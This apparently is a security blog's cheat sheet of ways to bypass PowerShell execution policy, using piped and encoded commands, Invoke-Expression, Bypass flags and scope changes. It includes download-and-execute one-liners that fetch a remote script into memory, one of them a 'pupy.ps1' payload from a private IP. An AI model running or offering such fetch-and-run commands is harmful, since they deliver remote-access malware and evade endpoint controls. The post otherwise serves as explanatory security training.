BYPASSING POWERSHELL EXECUTION POLICY

POLICY STATUS

PS C:> Get-ExecutionPolicy (Restricted/Bypass)

POLICY SCOPE 

Get-ExecutionPolicy -List | Format-Table -AutoSize

BYPASS POLICY 

1. COPY & PASTE

PS> write-host "string to execute"

CMD> Powershell -command "Write-Host 'My voice is my passport, verify me.'"
CMD> Powershell -c "Write-Host 'My voice is my passport, verify me.'"

2. ECHO SCRIPT

CMD> Echo Write-Host "powershell script"  | PowerShell.exe -noprofile -

3. From FILE pipe to standard in

Get-Content .runme.ps1 | PowerShell.exe -noprofile -
or
TYPE .runme.ps1 | PowerShell.exe -noprofile -

4. ONLINER

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.43.221/pupy.ps1')"

5. ENCODED

$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

AFTER ENCODING

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

6. INVOKE COMMAND

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

7. INVOKE EXPRESSION

Get-Content .runme.ps1 | Invoke-Expression OR GC .runme.ps1 | iex

RESTRICT /BYPASS EXECUTION-POLICY

RUN WITHOUT CONF CHANGE
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1

FOR UNSIGNED SCRIPTS

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1

SIGN IT  http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
THEN USE
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

STATUS OF SCOPE

Set-ExecutionPolicy -Scope Process

FOR PROCESS (SESSION)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

FOR USER PRSISTENT VIA REG KEY
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

MODIFYING REG KEY (PERSISTENT)
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell


REF : https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • IDS, IPS AND FIREWALL EVASION USING NMAP
    NIDS – Network Intrusion Detection System   • It Uses a network tap, span port, or hub to collect packets on the network  • Attempts t...
  • FOOTPRINTING
    Footprinting  (Also Known As Reconnaissance) Is The Technique Used For Gathering Information About Computer Systems And The Entit...
  • ALL ABOUT DNS
    Domain Name Servers (DNS) are the Internet's equivalent of a phone book. They maintain a directory of domain names and translate them ...
  • Introduction To Linux
    In the early 80s Richard Stallman working in the AI lab in MIT started the GNU Project with the goal of creating an entire free and open...
  • VPN CONCENTRATORS
    A VPN concentrator is a type of networking device that provides secure creation of VPN connections and delivery of messages between VPN nod...
  • DIRECTORY TRAVERSAL
    What is a Directory Traversal attack? Directory traversal or Path Traversal is an HTTP attack which allows attackers to access restr...
  • ADVANCE EVASION TECHNIQUES
    Insertion An IDS can accept a packet that an end-system rejects. An IDS that does this makes the mistake of believing that the end-system...